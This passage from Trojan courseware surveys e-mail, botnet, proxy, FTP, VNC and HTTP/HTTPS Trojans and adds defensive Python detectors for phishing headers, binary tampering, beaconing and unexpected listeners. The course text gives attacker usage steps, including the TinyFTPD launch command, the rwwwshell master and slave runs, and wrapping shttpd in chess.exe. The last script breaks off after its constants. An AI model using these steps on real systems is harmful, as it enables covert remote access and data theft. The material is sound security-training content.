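"""Triage an inbound message for the traits of an e-mail Trojan.

Added example, not from the CEH courseware. It parses a raw message with
the standard library and reports: a From header whose domain differs from
the envelope sender (Return-Path), a Reply-To pointing elsewhere, a first
relay hop with no reverse DNS name, and executable attachments.
The message below is constructed for the example.
"""
import email
from email import policy
from email.utils import parseaddr

EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".bat", ".com", ".cmd", ".js", ".vbs", ".hta"}

SAMPLE_MESSAGE = """\
Return-Path: <bounce-4471@mail-relay.example.net>
Received: from mail-relay.example.net (mail-relay.example.net [198.51.100.7])
\tby mx.victim.example (Postfix) with ESMTP id 5A1B2C; Sun, 2 Sep 2012 10:15:03 +0000
Received: from [203.0.113.9] (unknown [203.0.113.9])
\tby mail-relay.example.net with SMTP; Sun, 2 Sep 2012 10:14:51 +0000
From: "Customer Service" <service@fedex.example>
Reply-To: tracking-desk@mailbox.example.org
To: john.stevens@victim.example
Subject: Shipment 867676340056 awaiting customs duty
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please open the attached tracking package to proceed.
--b1
Content-Type: application/octet-stream; name="Package.exe"
Content-Disposition: attachment; filename="Package.exe"
Content-Transfer-Encoding: base64

aGVsbG8=
--b1--
"""


def domain_of(header_value):
    """Lower-cased domain of the first address in a header, or '' if none."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def attachment_names(msg):
    """File names of every attachment part of a parsed EmailMessage."""
    return [part.get_filename() or "" for part in msg.iter_attachments()]


def triage_message(raw):
    """Return a list of human-readable findings for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_dom = domain_of(msg["From"])
    ret_dom = domain_of(msg["Return-Path"])
    if ret_dom and ret_dom != from_dom:
        findings.append(f"envelope sender domain {ret_dom} differs from From domain {from_dom}")
    reply_dom = domain_of(msg["Reply-To"])
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    # Each hop prepends its own Received header, so the last one is the first hop.
    hops = msg.get_all("Received") or []
    if hops and "(unknown [" in str(hops[-1]):
        findings.append("first relay hop has no reverse DNS name")
    for name in attachment_names(msg):
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in EXEC_EXTENSIONS:
            findings.append(f"executable attachment {name}")
    return findings


if __name__ == "__main__":
    for line in triage_message(SAMPLE_MESSAGE):
        print(line)
```

Mailing-list and marketing mail legitimately use a bounce address on another domain, so the first two findings are scoring signals rather than verdicts; the executable attachment is the one most gateways block outright, which is why real campaigns hide the payload inside a document as the previous section describes.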
FIGURE 6.15: Illustrating the attack process using email Trojans (diagram: instructions are sent to the victim through e-mails; Attacker -> Email -> Internet -> Firewall -> Victim; the exchange reads "Any commands for me?", "Send me :\creditcard.txt file and launch calc.exe", "Here is the requested file", "Calc.exe executed")
E-mail Trojans: RemoteByMail

RemoteByMail is used to control and access a computer, irrespective of its location, simply by sending e-mail. With simple commands sent by e-mail to a computer at work or at home, it can perform the following tasks:

- Retrieve lists of files and folders easily
- Automatically zip files that are to be transferred
- Execute programs or batch files, or open files

This is an easier way to access files or to execute programs on a computer remotely. The main screen displays information that the program has received and processed:

- Start Server: Click the Start Server icon for RemoteByMail to begin the process and receive e-mail
- Stop: Click the Stop icon to stop the application at any time
- Check now: Checks for the next scheduled e-mail
- Statistics: Displays program information
- Listening to Accounts: Displays accounts and associated e-mail addresses
- Emails received: Displays the list of e-mails containing commands that the program has received
- Command queue: Displays commands the program has received but not yet processed
- Outgoing emails: Checks for e-mail being processed
- Emails sent: Displays the list of e-mails sent by RemoteByMail

RemoteByMail accepts and executes the following commands:

- HI: Sends an e-mail with the content "Hi" to your e-mail address
- SEND: Sends files located on the host computer to your e-mail address
- ZEND: Zips and then sends files or folders located on the host computer to your e-mail address. To open a Zip attachment after you receive it, enter the password you chose when you created the account
- EXECUTE: Executes programs or batch files on the host computer
- DIR: Sends the directory listing of a drive or folder to your e-mail address
FIGURE 6.16: RemoteByMail screenshots (main window showing the next e-mail check and "Now checking" status, POP and SMTP server, user and password settings, and the list of listening accounts)
Defacement Trojans

Defacement Trojans, once spread over the system, can destroy or change the entire content of the database. A defacement Trojan is more dangerous when attackers target websites: they physically change the entire HTML, which changes the content of the website, and the loss is even greater when the defacement targets e-business activities. A resource editor allows you to view and edit almost any aspect of a compiled Windows program, from the menus to the dialog boxes to the icons and beyond. Resource editors allow you to view, edit, extract, and replace strings, bitmaps, logos, and icons from any Windows program. Attackers apply User-styled Custom Applications (UCAs) to deface Windows applications. Example of calc.exe defaced:
Defaced calc.exe (screenshot): a Calculator window whose title bar and menu read "You Are Hacked!!!!", with the standard View and Help menus and the number keypad otherwise intact.

FIGURE 6.16: An example of calc.exe defaced
Defacement Trojans: Restorator

Source: http://www.bome.com

Restorator is a versatile skin editor for any Win32 program. The tool can modify the user interface of any 32-bit Windows program and thus create User-styled Custom Applications (UCAs). You can view, extract, add, remove, and change images, icons, text, dialogs, sounds, videos, version information, and menus in almost all programs. Technically speaking, it lets you edit the resources in many file types, for example .ocx (ActiveX), .scr (Screen Saver), and others. The attacker can distribute the modifications in a small, self-executing file: a standalone program that re-applies the modifications made to a program. Its Grab function allows you to retrieve resources from files on a target's disk.

Restorator is the Bome flagship product for resource editing (resources are application-dependent data that the respective programmer includes in the program). It is a utility for editing Windows resources in applications and their components, e.g., files with .exe, .dll, .res, .rc, and .dcr extensions. You can use it for translation/localization, customization, design improvement, and development. This resource editor comes with an intuitive user interface. You can replace logos and control resource files in the software development process. It can intrude into the target's system and its working programs.
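A resource edit of the kind just described rewrites the bytes of the target executable, so the simplest defence is a digest baseline of the binaries you care about, taken from a known-good install and compared later. The following is an added example, not code from the CEH courseware or from Restorator: it walks a folder, records SHA-256 digests of files with watched extensions, and reports modified, missing and newly added binaries. The folder, the stand-in calc.exe and the "edit" that swaps its title string are all constructed in a temporary directory.

```python
"""Detect a defaced (resource-edited) program with a hash baseline.

Added example, not from the CEH courseware or from Restorator. A resource
edit changes the file bytes of the target executable, so a baseline of
SHA-256 digests from a known-good install detects it even though the
program still runs normally. The directory and the "edit" below are
constructed in a temporary folder.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Streaming SHA-256 of one file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, extensions=(".exe", ".dll", ".ocx", ".scr")):
    """Map relative path -> SHA-256 for every file with a watched extension under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_of(full)
    return manifest


def compare_manifests(baseline, current):
    """Sorted lists of modified, missing and added paths between two manifests."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def simulate_defacement():
    """Constructed scenario: baseline a fake System32, then 'edit' calc.exe's title resource."""
    with tempfile.TemporaryDirectory() as root:
        sys32 = os.path.join(root, "System32")
        os.makedirs(sys32)
        calc = os.path.join(sys32, "calc.exe")
        with open(calc, "wb") as f:
            # Constructed stand-in for a PE file: MZ header padding plus a string table.
            f.write(b"MZ" + b"\x00" * 62 + b"STRINGTABLE Calculator")
        with open(os.path.join(sys32, "kernel32.dll"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62 + b"kernel")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("not a watched extension")
        baseline = build_manifest(root)

        # The 'defacement': replace the window title string in place, as a resource editor would.
        with open(calc, "rb") as f:
            data = f.read().replace(b"Calculator", b"You Are Hacked!!!!")
        with open(calc, "wb") as f:
            f.write(data)
        # A dropped extra binary, named like one of the MoSucker suggestions earlier in this module.
        with open(os.path.join(sys32, "msnetcfg.exe"), "wb") as f:
            f.write(b"MZ dropped")
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(simulate_defacement())
```

On a real Windows host the baseline should be taken from install media or a reference machine, not from the possibly already modified system, and the comparison is best paired with a signature check (Get-AuthenticodeSignature in PowerShell), since a resource edit also invalidates the publisher's signature on signed binaries.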
FIGURE 6.17: Restorator screenshot (Restorator 2007 Trial opened on C:\Software\Softpedia.exe: the Resource Tree shows String, RCData, Icon, Version and Manifest nodes; the String\4089\Neutral entries include "Integer overflow", "Invalid floating point operation", "Floating point division by zero", "Floating point overflow" and "Floating point underflow"; an Options dialog shows the tabs Codepage, Shell Integration, Viewer, Text Editor, File Browser, RC Files and Advanced with settings such as "Show ToolTips", "Allow multiple Restorator instances", "Show splash screen on start", "Keep Restorator window always on top", "Ask for folder when assigning/extracting all", number of recently used files (10) and number of recently found files (20))
Botnet Trojans

- Botnet Trojans infect a large number of computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center
- A botnet is used to launch various attacks on a victim, including denial-of-service attacks, spamming, click fraud, and the theft of financial information
A botnet is a collection of software robots (worms, Trojan horses, and backdoors) that run automatically. The term refers to a collection of compromised machines running programs under a common command and control infrastructure; the botnet's originator (the attacker) can control the group remotely. These are computers (a group of zombie computers) infected by worms or Trojans, taken over surreptitiously by attackers, and brought into networks to send spam or more viruses or to launch denial-of-service attacks. Each bot is a computer that has been infected and taken over by an attacker using a virus, Trojan, or other malware. Botnet owners usually target educational, government, military, and other networks. With the help of botnets, attacks such as denial of service, creation or misuse of SMTP mail, click fraud, and theft of application serial numbers, login IDs, credit card numbers, etc. are performed.
FIGURE 6.18: Illustrating the process of infecting a company's website using Botnet Trojans (diagram with the Botnet C&C Server, the Botnet Server, and the target Website)
It has two main components:

- Botnet
- Botmaster

Botnets target both businesses and individual systems to steal valuable information. There are four botnet topologies:

- Hierarchical
- Multi-server
- Star
- Random (mesh)
Botnet Trojan: Illusion Bot and NetBot Attacker

Illusion Bot is a GUI tool with a clear configuration interface. When the bot starts, it checks the OS version; if it detects Windows 98, it calls the RegisterServiceProcess API to hide the process from the Task Manager. The bot then proceeds to install its rootkit component. If that installation fails, the bot tries to inject its code into the explorer.exe process.

Features:

- C&C can be managed over IRC and HTTP
- Proxy functionality (Socks4, Socks5)
- FTP service
- MD5 support for passwords
- Rootkit
- Code injection
- Colored IRC messages
- XP SP2 Firewall bypass
- DDoS capabilities
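An IRC-managed bot like the one above has a network footprint that the botnet description earlier in this section also predicts: many internal hosts calling the same external server, usually on an IRC port, and each bot checking in at a fixed interval. The following is an added example, not code from the CEH courseware or from either tool: it parses constructed outbound-connection log lines (the "timestamp source destination port" layout and all addresses are assumed for the example) and reports destinations contacted on IRC ports, destinations shared by several internal hosts, and per-host beaconing with near-constant intervals.

```python
"""Spot botnet C&C traffic in outbound connection logs.

Added example (not from the CEH courseware). Bots managed over IRC make
many internal hosts contact the same external server on an IRC port at
regular intervals. This groups constructed firewall log lines by
destination and reports (1) endpoints on IRC ports, (2) endpoints shared
by several internal hosts and (3) per-host beaconing with near-constant
intervals. The log lines are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

IRC_PORTS = {6666, 6667, 6668, 6669, 6697, 7000}
SHARED_DST_THRESHOLD = 3      # distinct internal hosts contacting one external endpoint
BEACON_MIN_CONNECTIONS = 4    # connections needed before judging regularity
BEACON_MAX_JITTER = 0.15      # stdev/mean of the intervals between connections

# Constructed outbound-connection log: "timestamp src dst dport" per line.
LOG_SAMPLE = """\
2012-09-02T10:00:00 10.0.0.11 203.0.113.50 6667
2012-09-02T10:00:05 10.0.0.12 203.0.113.50 6667
2012-09-02T10:00:09 10.0.0.13 203.0.113.50 6667
2012-09-02T10:00:30 10.0.0.11 93.184.216.34 443
2012-09-02T10:01:00 10.0.0.11 203.0.113.50 6667
2012-09-02T10:02:00 10.0.0.11 203.0.113.50 6667
2012-09-02T10:03:00 10.0.0.11 203.0.113.50 6667
2012-09-02T10:03:10 10.0.0.14 198.51.100.20 443
2012-09-02T10:05:00 10.0.0.12 203.0.113.50 6667
2012-09-02T10:07:42 10.0.0.14 198.51.100.20 443
2012-09-02T10:09:01 10.0.0.14 198.51.100.20 443
2012-09-02T10:15:30 10.0.0.14 198.51.100.20 443
"""


def parse_log(text):
    """Return (datetime, src, dst, port) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return events


def shared_destinations(events, threshold=SHARED_DST_THRESHOLD):
    """Endpoints (dst, port) on an IRC port or contacted by >= threshold distinct sources."""
    sources = defaultdict(set)
    for _, src, dst, port in events:
        sources[(dst, port)].add(src)
    flagged = {}
    for (dst, port), srcs in sources.items():
        reasons = []
        if port in IRC_PORTS:
            reasons.append("IRC port")
        if len(srcs) >= threshold:
            reasons.append(f"{len(srcs)} internal hosts")
        if reasons:
            flagged[(dst, port)] = reasons
    return flagged


def beaconing_pairs(events, min_conn=BEACON_MIN_CONNECTIONS, max_jitter=BEACON_MAX_JITTER):
    """(src, dst, port) -> mean interval in seconds for pairs that connect on a fixed cadence."""
    stamps = defaultdict(list)
    for ts, src, dst, port in events:
        stamps[(src, dst, port)].append(ts)
    beacons = {}
    for key, times in stamps.items():
        if len(times) < min_conn:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Low relative spread of the gaps means a timer, not a person, opens the connections.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = round(avg, 1)
    return beacons


if __name__ == "__main__":
    events = parse_log(LOG_SAMPLE)
    for endpoint, reasons in shared_destinations(events).items():
        print(f"{endpoint[0]}:{endpoint[1]} -> {', '.join(reasons)}")
    for (src, dst, port), interval in beaconing_pairs(events).items():
        print(f"{src} beacons to {dst}:{port} every {interval}s")
```

The port list only catches bots that keep the IRC default; the shared-destination and beaconing rules are what still apply when C&C moves to HTTP on port 80 or 443, as the Illusion Bot feature list allows, because they key on behaviour rather than on a port number.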
NetBot Attacker provides a simple Windows UI for controlling a botnet, reporting on and managing the network, and commanding attacks. It installs into the system in a very simple way, as a RAR file with two pieces: an INI file (shown in the following screenshot, partially edited and obscured) and a simple EXE. The original NetBot Attacker is a backdoor; this tool retains that capability and lets you update the bot and be a part of the rest of the botnet.
FIGURE 6.18: Illusion Bot and NetBot Attacker screenshots (configuration window with IRC administration fields Host, Port (6667), Chan and Pass; web administration fields Host, Port and Path; Socks4, Socks5 and FTP ports; a random port range 2001-3000; a bindshell port; IRC access and bot password; and options such as "Colored IRC messages", "MD5 crypt", "Auto OP admin on IRC channel", "Inject code", "Bypass XP SP2 Firewall" and "Add to autoload")
Proxy Server Trojans
Proxy Trojan: Trojan Proxy is usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet.
Hidden Server: A proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer.
Infection: Thousands of machines on the Internet are infected with proxy servers using this technique.
[Diagram: Attacker -> Victim (Proxied) -> Internet -> Target company]
Proxy Server Trojans
A proxy server Trojan is a type of Trojan that customizes the target's system to act as a proxy server. A proxy server Trojan, when it infects a machine, starts a hidden proxy server on the victim's computer. The attacker can use this to carry out illegal activities such as credit card fraud and identity theft, and can even launch malicious attacks against other networks. The Trojan can communicate with other proxy servers and can also send an email that contains the related information.
[Diagram: Attacker -> Victim (Proxied) -> Internet -> Target Company]
FIGURE 6.19: Attacker infecting Target company's system using Proxy Server Trojans
Proxy Server Trojan: W3bPr0xy Tr0j4nCr34t0r (Funny Name)
W3bPr0xy Tr0j4n is a proxy server Trojan which supports multiple connections from many clients and reports IP and ports to the mail of the Trojan owner.
Proxy Server Trojan: W3bPr0xy Tr0j4nCr34t0r (Funny Name)
W3bPr0xy Tr0j4nCr34t0r is a proxy server Trojan developed in order to access systems remotely. It supports multiple connections from many clients and reports IP and ports to the email of the Trojan owner.
[Screenshot: W3bPr0xy Tr0j4nCr34t0r V.1.0 configuration. Listening Ports (separate ports with a semicolon); the ports listed include 10, 21, 22, 80, 81, 135, 136, 666, 1433, 1434 and 2012. The detected IP address and the banner "Welcome to W3bPr0xy Tr0j4nCr34t0r V.1.0" are shown.]
FIGURE 6.20: W3bPr0xy Tr0j4nCr34t0r detecting IP address
FTP Trojans
FTP Trojans install an FTP server on the victim's machine, which opens FTP ports. An attacker can then connect to the victim's machine using the FTP port to download any files that exist on the victim's computer.
[Diagram: Attacker: "Send me c:\creditcard.txt file" -> Victim (FTP Server installed in the background) -> "Here is the requested file"; a directory listing of the victim's C:\ drive]
FTP Trojan: TinyFTPD
[Screenshot: TinyFTPD started from a command prompt with "TinyFTPD 21 55555 test test c:\win98 all RWLCD"; the server reports control port 21, bind port 55555, user name and password "test", home directory c:\win98, allowed IP "all", local address 192.168.168.16, read/write/list/create/delete/execute access Yes, unlock and anonymous access No]
FTP Trojans
An FTP Trojan is a type of Trojan that is designed to open port 21 and make the target's system accessible to the attacker. It installs an FTP server on the target's machine, allowing the attacker to gain access to sensitive data and download/upload files/programs through the FTP protocol. Further, it also installs malware on the target's system. Credit card information, confidential data, and email addresses can be harvested, and password attacks can also be employed, once the attacker gains access to the system.
[Diagram: Hacker: "Send me c:\creditcard.txt file" -> Victim (FTP Server installed in the background) -> "Here is the requested file"; directory listing of C:\ showing abc.txt, AdventNet, AUTOEXEC.BAT, CONFIG.SYS, Data and Documents and Settings]
FIGURE 6.21: Attacker infecting victim's system using FTP Trojans
FTP Trojan: TinyFTPD
[Screenshot: Command Prompt]
C:\Documents and Settings\Admin\Desktop\TinyFTPD 21 55555 test test c:\win98 all RWLCD
Tiny FTPD V1.4 By WinEggDrop
FTP Server Is Started
ControlPort: 21
BindPort: 55555
UserName: test
Password: test
HomeDir: c:\win98
Allowd IP: all
Local Address: 192.168.168.16
ReadAccess: Yes
WriteAccess: Yes
ListAccess: Yes
CreateAccess: Yes
DeleteAccess: Yes
ExecuteAccess: Yes
UnlockAccess: No
AnonymousAccess: No
Check Time Out Thread Created Successfully
***************
Waiting For New Connection
0 Connection Is In Use
FIGURE 6.22: TinyFTPD Screenshot
VNC Trojans
- VNC Trojan starts a VNC Server daemon in the infected system
- It connects to the victim using any VNC viewer with the password "secret"
- Since the VNC program is considered a utility, this Trojan will never be detected by anti-virus
[Diagram: Attacker -> command and control instruction -> Victim (VNC Server)]
VNC Trojans
VNC Trojans allow attackers to use the target's computer as a VNC server. These Trojans won't be detected by antiviruses after they are run, because VNC Server is considered a utility. A VNC Trojan performs the following functions when it infects the system:
- Starts VNC Server daemon in the background when infected
- Connects to the target using any VNC viewer with the password "secret"
[Diagram: Attacker -> command and control instruction / VNC traffic -> Victim (VNC Server)]
FIGURE 6.23: Attacker uses victim's computer as VNC server using VNC Trojans
VNC Trojans: WinVNC and VNC Stealer
[Screenshot: WinVNC "Current User Properties" dialog (Incoming Connections: Accept Socket Connections, Display Number, Password, Accept CORBA Connections, Disable Remote Keyboard & Pointer, Disable Local Keyboard & Pointer; Update Handling: Poll Full Screen, Poll Foreground Window, Poll Window Under Cursor, Poll Console Windows Only) and the VNC Stealer window with its FTP settings (Host)]
VNC Trojans: WinVNC and VNC Stealer
WinVNC and VNC Stealer are two VNC Trojans.
WinVNC: WinVNC is used for a remote view of, or to control, a Windows machine, so it becomes a threat when attackers are able to inject a Trojan into the system and then access the target's system remotely.
VNC Stealer: VNC Stealer is a Trojan written in Visual Basic. VNC.EXE has been used to perform the following behavior:
- The process is packed and/or encrypted using a software packing process
- Creates system tray pop-ups, messages, errors, and security warnings
- Adds products to the system registry
- Writes to another process's virtual memory (process hijacking)
- Executes a process
- Creates new folders on the system
- This process deletes other processes from a disk
- The process hooks code into all running processes, which could allow it to take control of the system or record keyboard input, mouse activity, and screen contents
- Registers a Dynamic Link Library file
[Screenshot: WinVNC "Current User Properties" dialog and the VNC Stealer window]
FIGURE 6.23: Screenshots showing WinVNC and VNC Stealer
HTTP/HTTPS Trojans
- HTTP Trojans can bypass any firewall and work in the reverse way of a straight HTTP tunnel
- They are executed on the internal host and spawn a child at a predetermined time
- The child program appears to be a user to the firewall, so it is allowed to access the Internet
[Diagram: Trojan on the internal host spawns a child; the child's HTTP request to download a file passes through the firewall]
HTTP/HTTPS Trojans
HTTP/HTTPS Trojans can bypass any firewall, and work in the reverse way of a straight HTTP tunnel. They use web-based interfaces and port 80. These Trojans are executed on the internal host and spawn a child every day at a certain time. The child program appears to be a user to the firewall which, in turn, allows it to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through a legitimate-looking HTTP request, and sends it a ready signal. The legitimate-looking answer from the attacker's web server is in reality a series of commands that the child can execute on the machine's local shell. All traffic is converted into a Base64-like structure and given as a value for a cgi-string, so the attacker can avoid detection. The following is an example of a connection:
Slave: GET /cgi-bin/order?M5mAejTgZdgYOdglOOBqFfVYTgjFLdgxEdblHe7krj HTTP/1.0
Master replies with: g5mAlfbknz
The GET of the internal host (SLAVE) is just the command prompt of the shell; the answer is an encoded "ls" command from the attacker on the external server (MASTER). The SLAVE tries to connect daily at a specified time to the MASTER. If needed, the child is spawned again, because if the shell hangs the attacker can check and fix it the next day. In case the administrator sees connections to the attacker's server and connects to it himself, the administrator just sees a
broken web server, because there is a token (password) in the encoded cgi GET request. WWW proxies (e.g., squid, a full-featured web proxy cache) are supported. The program masks its name in the process listing. The programs are reasonably small: the master and slave programs are just 260 lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and run "rwwwshell.pl" on the MASTER just before the time at which the slave tries to connect.
FIGURE 6.24: Victim's system infected with HTTP Trojans
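The exchange described above (a cgi GET whose value is a Base64-like blob, repeated daily at a fixed time, with an encoded "ls" coming back from the master) is exactly what a web proxy log records. As an added example, not part of the courseware and not from the rwwwshell project, the following Python script scans proxy log lines for both traits: query fields that look like an encoded blob (Base64 alphabet, 24 or more characters, high Shannon entropy) and a client that contacts the same host in the same hour on several distinct days. The log format, hosts and client addresses are constructed for the example; only the first query string is the one quoted on the page, the other two blobs are made up.

```python
"""Spot rwwwshell-style reverse WWW shell traffic in a web proxy log.

Added example, not from the courseware or the rwwwshell project. It tests
for the two traits the text describes: a cgi GET whose value is a long
Base64-like blob, and the same host contacted at the same time of day on
successive days. The log lines are constructed and use a simplified
"<ISO timestamp> <client ip> <method> <url>" format.
"""
import math
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log. The first query string is the one quoted on the page;
# the other two blobs and all hosts and addresses are made up.
LOG_SAMPLE = """\
2012-08-14T03:00:02 10.0.0.23 GET http://www.example.net/cgi-bin/order?M5mAejTgZdgYOdglOOBqFfVYTgjFLdgxEdblHe7krj
2012-08-14T08:15:41 10.0.0.23 GET http://www.example.com/search?q=quarterly+report
2012-08-14T09:02:10 10.0.0.41 GET http://static.example.com/css/site.css
2012-08-15T03:00:01 10.0.0.23 GET http://www.example.net/cgi-bin/order?p4WqzTnRYdLkc2VbQ9eoFhsUx1GmJiA7KvBt
2012-08-15T11:30:07 10.0.0.41 GET http://www.example.com/search?q=lunch+menu
2012-08-16T03:00:03 10.0.0.23 GET http://www.example.net/cgi-bin/order?H2ZslEyWoQa8xTdvK5pMnC3bJrFgU0iLeYhN
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{24,}$")   # Base64 alphabet, long enough to matter


def shannon_entropy(s):
    """Bits per character of the string's character distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Yield (timestamp, client, method, url) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def encoded_query_values(url, min_entropy=4.0):
    """Return query fields that look like an encoded blob rather than readable text."""
    hits = []
    for field in urlsplit(url).query.split("&"):
        blob = field.split("=", 1)[-1]      # value of key=value, or the bare field
        if B64_RE.match(blob) and shannon_entropy(blob) >= min_entropy:
            hits.append(blob)
    return hits


def daily_beacons(records, min_days=3):
    """(client, host, hour) triples seen on at least min_days distinct days."""
    days_seen = defaultdict(set)
    for ts, client, _method, url in records:
        days_seen[(client, urlsplit(url).hostname, ts.hour)].add(ts.date())
    return sorted(key for key, days in days_seen.items() if len(days) >= min_days)


def analyse(text):
    """Run both checks over a log and return the findings as dicts."""
    records = list(parse_log(text))
    findings = []
    for ts, client, _method, url in records:
        for blob in encoded_query_values(url):
            findings.append({"kind": "encoded_query", "when": ts.isoformat(), "client": client,
                             "url": url, "entropy": round(shannon_entropy(blob), 2)})
    for client, host, hour in daily_beacons(records):
        findings.append({"kind": "daily_beacon", "client": client, "host": host, "hour": hour})
    return findings


if __name__ == "__main__":
    for f in analyse(LOG_SAMPLE):
        print(f)
```

The entropy threshold of 4.0 bits per character is a starting point, not a tuned value: ordinary search terms and file names sit well below it, while a Base64-like blob of 24 or more characters from an encoded shell session sits above it. The beacon check buckets by hour because the slide says only that the child connects "at a predetermined time"; a tighter window is easy to substitute once real timing is known.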
HTTP Trojan: HTTP RAT
- Infect the victim's computer with server.exe and plant the HTTP Trojan
- The Trojan sends an email with the location of an IP address
- Connect to the IP address using a browser to port 80
- Displays ads, records personal data/keystrokes
- Downloads unsolicited files, disables programs/system
- Floods Internet connection, and distributes threats
- Tracks browsing activities and hijacks Internet browser
- Makes fraudulent claims about spyware detection and removal
HTTP Trojan: HTTP RAT
RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. A RAT can provide a back door for administrative control over the target computer. Once the target system is compromised, the attacker can use it to distribute RATs to other vulnerable computers and establish a botnet. The RAT enables administrative control and makes it possible for the attacker to watch all the target's actions using keyloggers or any other spyware. An attacker can also commit credit card fraud and identity theft using confidential information, and can remotely access webcams and video recordings, take screenshots, format drives, and delete, download, and alter files. It can't be detected, as it works like a genuine program and is not easily noticed.
[Screenshot: HTTP RAT 0.31 builder ("backdoor webserver, by z0mbie"): option to send a notification with the IP address to mail, SMTP server used for sending mail, destination email address, server port 80, and generation of server.exe; a browser connected to the infected computer shows "welcome 2 HTTP_RAT infected computer >:]"]
Steps shown: infect the victim's computer with server.exe and plant the HTTP Trojan; the Trojan sends an email with the location of an IP address; connect to the IP address using a browser on port 80.
FIGURE 6.25: Attacker infecting Victim's system using HTTP RAT
Shttpd Trojan - HTTPS (SSL)
- SHTTPD is a small HTTP server that can be embedded inside any program
- It can be wrapped with a genuine program (game chess.exe); when executed, it will turn a computer into an invisible web server
[Diagram: Attacker and Victim, addresses 10.0.0.8:443 and 10.0.0.5:443, with encrypted traffic between them. Normally the firewall allows you through port 443. Infect the victim's computer with chess.exe; Shttpd should be running in the background listening on port 443 (SSL); connect to the victim using a web browser: http://10.0.0.5:443]
Shttpd Trojan - HTTPS (SSL)
Shttpd is a small HTTP server that can easily be embedded inside any program. C++ source code is provided. Even though shttpd is not a Trojan, it can easily be wrapped with a chess.exe file and it can turn a computer into an invisible web server.
- Infect the target's computer with chess.exe.
- Shttpd should be running in the background listening on port 443 (SSL).
- Connect to the target using a web browser: http://10.0.0.5:443.
[Diagram: Attacker and Victim, addresses 10.0.0.8:443 and 10.0.0.5:443, encrypted traffic; normally the firewall allows you through port 443; infect the victim's computer with chess.exe; Shttpd running in the background listening on port 443 (SSL); connect to the victim using a web browser at http://10.0.0.5:443]
FIGURE 6.26: Attacker infecting Victim's system using Shttpd Trojan
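Every server-side Trojan in this module, whether it is the hidden proxy, the TinyFTPD listener on port 21, the VNC server daemon, or shttpd wrapped in chess.exe on port 443, shows up on the host as a listening socket owned by a process that was not there before. As an added example (not courseware code and not from any of the tools named here), the following Python script compares a snapshot of Windows netstat -ano and tasklist /fo csv output against a baseline of expected listeners and reports everything else, including a process squatting on a port the baseline considers normal. The netstat and tasklist text, the baseline and the port-to-service table are all constructed for the example.

```python
"""Flag unexpected listening sockets from Windows netstat/tasklist output.

Added example, not part of the CEH courseware or of any tool it names.
Proxy, FTP, VNC and shttpd-style Trojans all announce themselves as a
new listening socket, so a listener inventory compared against a baseline
is a cheap host-side check. The netstat and tasklist text below is
constructed sample output.
"""
import csv
import io
import re

# Constructed sample of `netstat -ano` output (Windows).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1844
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       2260
  TCP    192.168.168.16:49210   192.168.168.1:443      ESTABLISHED     3120
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2816
  UDP    0.0.0.0:5355           *:*                                    1104
"""

# Constructed sample of `tasklist /fo csv` output.
TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","236 K"
"svchost.exe","912","Services","0","7,812 K"
"TinyFTPD.exe","1844","Console","1","2,104 K"
"vnc.exe","2260","Console","1","5,420 K"
"chess.exe","2816","Console","1","9,004 K"
"firefox.exe","3120","Console","1","180,220 K"
"""

# Baseline of listeners expected on this host: port -> image name (constructed).
BASELINE = {135: "svchost.exe", 445: "System"}

# Ports that the Trojan families in this module are known to open.
SUSPECT_PORTS = {21: "FTP server", 443: "HTTPS/shttpd", 1080: "SOCKS proxy",
                 5900: "VNC server", 6667: "IRC C&C"}

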